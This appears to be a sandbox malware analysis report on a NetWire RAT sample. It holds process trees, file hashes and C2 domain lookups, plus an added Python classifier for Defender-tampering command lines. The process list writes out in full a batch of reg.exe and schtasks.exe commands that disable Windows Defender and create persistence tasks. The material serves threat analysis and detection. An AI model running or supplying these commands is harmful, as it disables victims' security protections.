Malware Analysis Report

2025-05-06 00:03

Sample ID 250420-bh9wjs1rx3
Target 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer
SHA256 00bdd3b2ccc6b339809704a8b12920327b76e6cdd9d0d1beddc38155a4532579
Tags
netwire botnet discovery rat stealer defense_evasion evasion trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

00bdd3b2ccc6b339809704a8b12920327b76e6cdd9d0d1beddc38155a4532579

Threat Level: Known bad

The file 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer was found to be: Known bad.

Malicious Activity Summary

netwire botnet discovery rat stealer defense_evasion evasion trojan

Modifies Windows Defender Real-time Protection settings

Modifies security service

NetWire RAT payload

Modifies Windows Defender DisableAntiSpyware settings

Netwire family

Netwire

Looks for VirtualBox Guest Additions in registry

Looks for VMWare Tools registry key

Executes dropped EXE

Checks computer location settings

Checks BIOS information in registry

Loads dropped DLL

Maps connected drives based on registry

Modifies Security services

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

System Location Discovery: System Language Discovery

NSIS installer

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Scheduled Task/Job: Scheduled Task

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-04-20 01:09

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2025-04-20 01:09

Reported

2025-04-20 01:12

Platform

win11-20250410-en

Max time kernel

1s

Max time network

133s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe"

Signatures

NetWire RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Netwire

botnet stealer netwire

Netwire family

netwire

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\WinDriversQt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\WinDriversQt.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4896 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
PID 4896 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
PID 4896 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
PID 4896 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
PID 4896 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
PID 4896 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
PID 1468 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Roaming\WinDriversQt.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Roaming\WinDriversQt.exe C:\Windows\system32\cmd.exe
PID 4896 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe
PID 4896 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe
PID 4896 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe

"C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe"

C:\Users\Admin\AppData\Roaming\WinDriversQt.exe

"C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"

C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe

"C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe"

C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe

"C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B14E.tmp\B14F.tmp\B150.bat C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"

C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe

"C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe"

C:\Users\Admin\AppData\Roaming\nb662-full.exe

"C:\Users\Admin\AppData\Roaming\nb662-full.exe"

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SDgtKxxeaGYFg" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7F10.tmp"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DiFGHpZsWh" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7F0E.tmp"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yBrhLIdmRX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7F0F.tmp"

C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe

"{path}"

C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe

"{path}"

C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe

"{path}"

C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe

"{path}"

C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe

"{path}"
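The reg.exe and schtasks.exe lines above are the contents of B150.bat as the sandbox saw them run: Defender policy overrides under HKLM\Software\Policies, the Defender services and drivers set to Start=4 (disabled), the Defender ETW autologgers set to Start=0, the Defender maintenance tasks disabled, the SecurityHealth autorun and EPP context-menu handlers deleted, and three new tasks created from XML files in Temp. Note the launch path: WinDriversQt.exe runs a 32-bit process (its schtasks calls go through SysWOW64) and reaches the 64-bit cmd.exe via the sysnative alias. On a host with Tamper Protection enabled the policy and service writes are blocked or reverted, but they still show intent and the task creation still succeeds, so all of them are worth alerting on. The classifier below is an added example, not sandbox code; its regular expressions are written against the exact command lines in this report and would need widening (PowerShell Set-MpPreference, sc.exe config, and so on) before use as a general rule. The one reg query line is a constructed benign control.

```python
"""Classify process command lines for Defender tampering and task persistence.

Added example for this report, not sandbox code. Rules are matched
case-insensitively against the raw command line; backslashes in patterns are
doubled because they are regex escapes.
"""
import re
from collections import Counter

RULES = [
    ("defender_policy_tamper",
     r'reg\s+(?:add|delete)\s+"?hklm\\software\\policies\\microsoft\\windows defender'),
    ("defender_service_disabled",
     r'reg\s+add\s+"?hklm\\system\\currentcontrolset\\services\\'
     r'(?:wdboot|wdfilter|wdnisdrv|wdnissvc|windefend)"?\s+/v\s+"?start"?.*?/d\s+"?4"?'),
    ("defender_etw_logger_disabled",
     r'autologger\\defender(?:api|audit)logger"?\s+/v\s+"?start"?.*?/d\s+"?0"?'),
    ("defender_task_disabled",
     r'schtasks\s+/change\s+/tn\s+"microsoft\\windows\\(?:windows defender|exploitguard)\\[^"]+"\s+/disable'),
    ("security_health_autorun_removed",
     r'reg\s+delete\s+.*?/v\s+"?securityhealth"?'),
    ("defender_shell_handler_removed",
     r'reg\s+delete\s+"?hkcr\\[^"]*shellex\\contextmenuhandlers\\epp'),
    ("task_created_from_temp_xml",
     r'schtasks(?:\.exe)?"?\s+/create\s+.*?/xml\s+"?[^"]*\\appdata\\local\\temp\\'),
]
COMPILED = [(tag, re.compile(pat, re.IGNORECASE)) for tag, pat in RULES]

REG_ADD_RE = re.compile(
    r'reg\s+add\s+"([^"]+)"\s+/v\s+"([^"]+)"\s+/t\s+(\S+)\s+/d\s+"([^"]+)"', re.IGNORECASE)

# Constructed sample: ten command lines copied from the process list above,
# plus one benign 'reg query' (not from the report) as a control.
SAMPLE_CMDLINES = [
    r'reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f',
    r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f',
    r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f',
    r'reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    r'schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    r'reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f',
    r'reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f',
    r'reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SDgtKxxeaGYFg" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7F10.tmp"',
    r'reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"',
]


def classify(cmdline):
    """Tags from RULES that match one command line (empty list = no finding)."""
    return [tag for tag, rx in COMPILED if rx.search(cmdline)]


def reg_add_fields(cmdline):
    """(key, value name, type, data) from a 'reg add ... /v ... /t ... /d ...' line, else None."""
    m = REG_ADD_RE.search(cmdline)
    return m.groups() if m else None


def summarize(cmdlines):
    """Count findings per tag across a process list."""
    counts = Counter()
    for c in cmdlines:
        counts.update(classify(c))
    return counts


def disabling_policy_values(cmdlines):
    """Defender policy values the command lines set to a disabling state.

    'Disable*' values disable when 1; MpEnablePus and SpynetReporting disable
    when 0; SubmitSamplesConsent=2 means 'never send samples'.
    """
    out = []
    for c in cmdlines:
        fields = reg_add_fields(c)
        if not fields or "defender_policy_tamper" not in classify(c):
            continue
        _key, name, _type, data = fields
        low = name.lower()
        if (low.startswith("disable") and data == "1") \
           or (low in ("mpenablepus", "spynetreporting") and data == "0") \
           or (low == "submitsamplesconsent" and data == "2"):
            out.append((name, data))
    return out


if __name__ == "__main__":
    for tag, n in summarize(SAMPLE_CMDLINES).most_common():
        print("%-35s %d" % (tag, n))
    print("disabling policy values:", disabling_policy_values(SAMPLE_CMDLINES))
```

Run over the full process list in this report the same rules tag every reg.exe and schtasks.exe line; the benign control is the only line that returns no tag.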

Network

Country Destination Domain Proto
US 8.8.8.8:53 maelus.mine.nu udp
US 8.8.8.8:53 victoire.dyndns.biz udp

Files

C:\Users\Admin\AppData\Roaming\WinDriversQt.exe

MD5 279205de551b3053fc8b973150577120
SHA1 8a78379b3af83ac4f2b1b07b7f968e2db7d1ea0b
SHA256 1d4070b3c282670191d1c5236ccad902e44e33a4d3211488eb52cd4e5223b159
SHA512 29664cb6ff47e5b0016076f7a3c248ed1deb90150669a4cc7357b7a190bd348372f551a652f92c459190ad479ed646cb7be465c389d039d74c5acb3eb254487b

C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe

MD5 9de85017f17de5b5872d27c4f66ca576
SHA1 abb2c3c99e58e498241f3c5b149821b79dbd1f21
SHA256 0771ac3786c447e25abdbbfd18f67b5c25405a4266add5a227c1d69ff5048ce0
SHA512 1265ab52ae96a97372316e2c0f1e8d648d0de7721d80a48340fb991038b6ffba640602d8592cffaa614db9b4f844b69e1d2988049a117631fe755d55759310e5

C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe

MD5 a5cc020492b0db504a7df2dbfed86cd1
SHA1 11fb92cd5b25dfd3a02220286f49d426b3f9d003
SHA256 e98a538725d3864aff69872345f950c572d4b4b727e7c916c0de37e813dbc03d
SHA512 ac69d9d6d0bc8cd632356b0c9bbc6eac6a91f6ab3ff7b3d1cbcdd5ff86cb0414643e251d2e6893afd614336c056914a815c2114b0fbc685f4a2fa780af1b0115

C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe

MD5 6c18cac0ed1782d322f237f060c4f07d
SHA1 fee4ecc2fc6c2189a81486bfa2d1a8a182100671
SHA256 6443b61c3f5404dbcd4538e7636a9b1d4b6e5b07f38d95fd9a7794f7f30934e2
SHA512 693d607ee51aec95d070fdc52f9ceb6716b6d36cb89184b67394cdca53c4afa9ca8bff761d39cf4290cf24ceaf5542f1868c029ed56341e92f46b9553c8899d9

C:\Users\Admin\AppData\Roaming\nb662-full.exe

MD5 2ea0aa5b989197690e73372dc23ae796
SHA1 497d114039585271b89fe954cea473fe32f33772
SHA256 16c723380e74451ae1e7ca45c4abbc4773d4da194f92817d72ffaaa3da5f66f4
SHA512 20ce64434a4cb0a806216e2647d67167a0c953e23d9ac2f8cfb80bf2c4638271d861463c802af156621a28a5c5d78e1b15c616b2e9ee2189bffeff5f7d25541d

memory/4192-57-0x0000000072D80000-0x0000000073531000-memory.dmp

memory/1300-59-0x00000000056C0000-0x0000000005752000-memory.dmp

memory/3368-58-0x0000000004F70000-0x0000000005516000-memory.dmp

memory/4192-63-0x0000000004FA0000-0x0000000004FAA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\cpudesc.dll

MD5 d25102051b33f61c9f7fb564a4556219
SHA1 c683964c11d5175171bd009cb08f87592c923f85
SHA256 e58e5d1d8da2ea526d0d754b4faad3773021166b0720723efb7b30f1f5075398
SHA512 8828eec31926251d7e51b5bf1050c3519c9b7fca4f978fb6ee0bf18f9642c3460687f10ff79e5892100ecadbf49725711567c348e1dfccb3644bd9ef992a92f0

C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\System.dll

MD5 6f5257c0b8c0ef4d440f4f4fce85fb1b
SHA1 b6ac111dfb0d1fc75ad09c56bde7830232395785
SHA256 b7ccb923387cc346731471b20fc3df1ead13ec8c2e3147353c71bb0bd59bc8b1
SHA512 a3cc27f1efb52fb8ecda54a7c36ada39cefeabb7b16f2112303ea463b0e1a4d745198d413eebb3551e012c84a20dcdf4359e511e51bc3f1a60b13f1e3bad1aa8

memory/3368-96-0x0000000004F10000-0x0000000004F2C000-memory.dmp

memory/1300-97-0x0000000005BD0000-0x0000000005C6C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\LangDLL.dll

MD5 ebd0da54db9f12ffd15206cc24355793
SHA1 910be3bebdde55eb1ce05915a79f01ebdc622786
SHA256 4066a0cbd9f6bb13c0f6fb064d4647ef7bc68a1be3d0caa4460b5ffd9ed1e0e6
SHA512 cee09db96267b1a30477ff074988606bdf35f9a5aa798a9a10029b11c0c347ab42a124320d777acde458828954cc8cf1a489b1673b31d589cdc4f50d4b86659d

C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\UserInfo.dll

MD5 8ef0e4eb7c89cdd2b552de746f5e2a53
SHA1 820f681e7cec409a02b194a487d1c8af1038acf0
SHA256 41293b9f6588e0fbdc8fcf2a9bd8e2b244cd5ff038fc13033378da337219c9dc
SHA512 a68533e8a19637d0d44219549b24baba0dc4824424842f125600fda3edcafc4bb6bb340d57a00815f262d82373b440d58d6e4e5b2ceb29bb3f6bc4cbde66c3c5

memory/4192-72-0x0000000006080000-0x00000000065AC000-memory.dmp

memory/4192-56-0x0000000000510000-0x000000000064A000-memory.dmp

memory/3368-55-0x0000000000020000-0x000000000015A000-memory.dmp

memory/1300-54-0x0000000000C20000-0x0000000000D5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B14E.tmp\B14F.tmp\B150.bat

MD5 665f21a9b6730aa08e62473e481b8c55
SHA1 717d52e75ac16bf032299828dd61c86af281eb43
SHA256 dcaba420b47b5527bd3761ae8a2b76bbbf387100613b7c2f256cfe9ec58fb579
SHA512 b3c6fe2555613f4f7b30ba434e94421c397008a999ff5c07b5df349c550ef6b4d2a8b831208ad3bb25998bf9d2fe0dbb86414ef23ef9216211ab96373d9b6f1e

memory/1300-45-0x0000000072D8E000-0x0000000072D8F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\nsDialogs.dll

MD5 d9256d9acaecabb20b7e9a1595abfa36
SHA1 ece1cab181dac7729246da1d4494b8daa10c3b70
SHA256 d7b2c55977a541f8d075e48d4e0a82eec79ad247b0ed168c19a8518131acd19c
SHA512 5827cdbfde0e766d1b74ecb22f9614232031da41c21d0f6ff6c9d5dcdfc0adc23e8fd616eb020ab42208932444b5e0cb1e6d6e698bead412eae19624a180b6ff

C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\UAC.dll

MD5 4814167aa1c7ec892e84907094646faa
SHA1 a57a5ecbdfa9a8777a3c587f1acb02b783afc5ee
SHA256 32dd7269abf5a0e5db888e307d9df313e87cef4f1b597965a9d8e00934658822
SHA512 fb1f35e393997ecd2301f371892b59574ee6b666095c3a435336160481f6ef7ed5635c90ce5d2cf88e5ef4a5affb46cb841b7d17e7981bd6e998531193f5d067

memory/4192-114-0x0000000072D80000-0x0000000073531000-memory.dmp

memory/4192-117-0x00000000066B0000-0x00000000066FC000-memory.dmp

memory/1300-116-0x0000000006D90000-0x0000000006DDC000-memory.dmp

memory/3368-115-0x0000000006200000-0x000000000624C000-memory.dmp

memory/3368-118-0x00000000062C0000-0x0000000006326000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp7F0F.tmp

MD5 208344347dd6b0c54f85e66f6aa78480
SHA1 b72f81b8ad0f85e752a57a053eb21a05aadb822c
SHA256 347401de3cfacbbbc16d84ae0f9bdab13166e1ea0abd554fe158a025d18c7613
SHA512 2295c8fba889be0bdd155e30716d3b254642453291bcc74d6c50b663b052a2a86e369977342c3975700b0de0c3de7f956b8364812f47bc0966f5e35d3ca14906

C:\Users\Admin\AppData\Local\Temp\tmp7F10.tmp

MD5 6505475046c7ce0540dc2625534a035b
SHA1 1c7cfd290c88c9876b4a2230bfb15981f53d11fe
SHA256 2dc1c2039d706fb941b02f5854e2c3b9453d1910c9d4e90470cd6289ef35c8e5
SHA512 3ab4e6e39b6cb2a5ec7f4192c185fffa35f1db827ce6fb41f0764e957c8bc931bc9c9e18267aac9a3f464eff120c2086442c61cf827e8e9504b48fa96693374c

C:\Users\Admin\AppData\Local\Temp\tmp7F0E.tmp

MD5 99757558dcf54d4ef129f8ce06ab0abc
SHA1 87a512fd9f09a5333b7edbfbc4525ece25f457f3
SHA256 09629e136aa57495f07732c5cd5e3e04eb9244e2b16d8d6478bc7153a7ae3fd8
SHA512 bf7240d5369b09789a768f8653c6c0ec49b2d3bbc2548b00f0476fa0ce4b33ad3b262e849ee03e25f73202069fd3eea74f13c1f5e8110e206d896ac8bafefdf3

memory/2708-141-0x0000000000400000-0x0000000000425000-memory.dmp

memory/2708-139-0x0000000000400000-0x0000000000425000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\GetFLE.ini

MD5 21533b9e9b48512d41f4766286d9f54c
SHA1 df97ece7c973ebbbf8a10b5ca60aac70e6359540
SHA256 d8c83f60e0b10b9a681336aa2c6776038c9d3f1ca2454e5bb7798a5bdbca4971
SHA512 40327c0b570c039df00d9bbe7d0fd7c8cf8e7376d3b637545b687aa1c53e23e88d8673a9a1ab50e9dbc59ff31921abc3e45de55063c6f5c5af3d2c9b2a9f9d44

C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\InstallOptions.dll

MD5 2a03c4a7ac5ee5e0e0a683949f70971b
SHA1 3bd9877caaea4804c0400420494ad1143179dcec
SHA256 d4f0042d8e7622b7e14395e926dd02edab3cdc77e82d88108b67a4d2cee9229b
SHA512 1942cdb522859f8dba46824786e361794a62e6201279201e1e0e2e07499fb6252933c5661782fccd77291c3650cafb2a7a08eee5431c8238f0da44840ee4c476

memory/4192-137-0x0000000072D80000-0x0000000073531000-memory.dmp

memory/3516-134-0x0000000000400000-0x0000000000425000-memory.dmp

memory/3516-132-0x0000000000400000-0x0000000000425000-memory.dmp

memory/876-130-0x0000000000400000-0x0000000000425000-memory.dmp

memory/876-128-0x0000000000400000-0x0000000000425000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2025-04-20 01:09

Reported

2025-04-20 01:12

Platform

win10v2004-20250314-en

Max time kernel

131s

Max time network

135s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe"

Signatures

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A

Modifies security service

defense_evasion
Description Indicator Process Target
